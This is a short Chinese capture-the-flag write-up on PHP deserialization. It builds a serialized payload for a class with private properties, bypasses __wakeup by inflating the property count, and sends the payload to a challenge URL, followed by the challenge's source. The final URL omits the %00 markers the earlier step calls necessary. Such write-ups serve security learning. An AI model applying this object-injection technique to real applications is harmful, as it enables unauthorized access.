反序列化 私有属性 绕过__wakeup__

反序列化 私有属性 绕过__wakeup__

1 生成序列化payload的代码

<?php
class Name{
    public $username = 'admin';
    public $password = 100;

    public function __construct($username,$password){
        $this->username = $username;
        $this->password = $password;
    }
}
$n=new Name('admin',100);
echo serialize($n);
?>

2 手工修改payload

2.1 原始序列化的类

O:4:"Name":2:{s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";i:100;}

2.2 将属性的数量设置为大于真实属性数,可以绕过wakeup函数,PHP5 < 5.6.25,PHP7 < 7.0.10

O:4:"Name":3:{s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";i:100;}

2.3 原始序列化的类,私有属性会在类名和属性名前加%00,复制时会丢失,所以该处手工加上

O:4:"Name":3:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";i:100;}

2.4 发送payload

http://035b9a35-d2a2-4489-81ae-1a031d8a5631.node4.buuoj.cn:81/index.php?select=O:4:"Name":3:{s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";i:100;}

3 原始题目类代码

<?php


class Name{
    private $username = 'nonono';
    private $password = 'yesyes';

    public function __construct($username,$password){
        $this->username = $username;
        $this->password = $password;
    }

    function __wakeup(){
        $this->username = 'guest';
    }

    function __destruct(){
        if ($this->password != 100) {
            echo "</br>NO!!!hacker!!!</br>";
            echo "You name is: ";
            echo $this->username;echo "</br>";
            echo "You password is: ";
            echo $this->password;echo "</br>";
            die();
        }
        if ($this->username === 'admin') {

            echo 66666;
        }else{
            echo "</br>hello my friend~~</br>sorry i can't give you the flag!";
            die();

            
        }
    }
}
?>
posted @ 2021-10-07 11:37  MuRKuo  阅读(613)  评论(0编辑  收藏  举报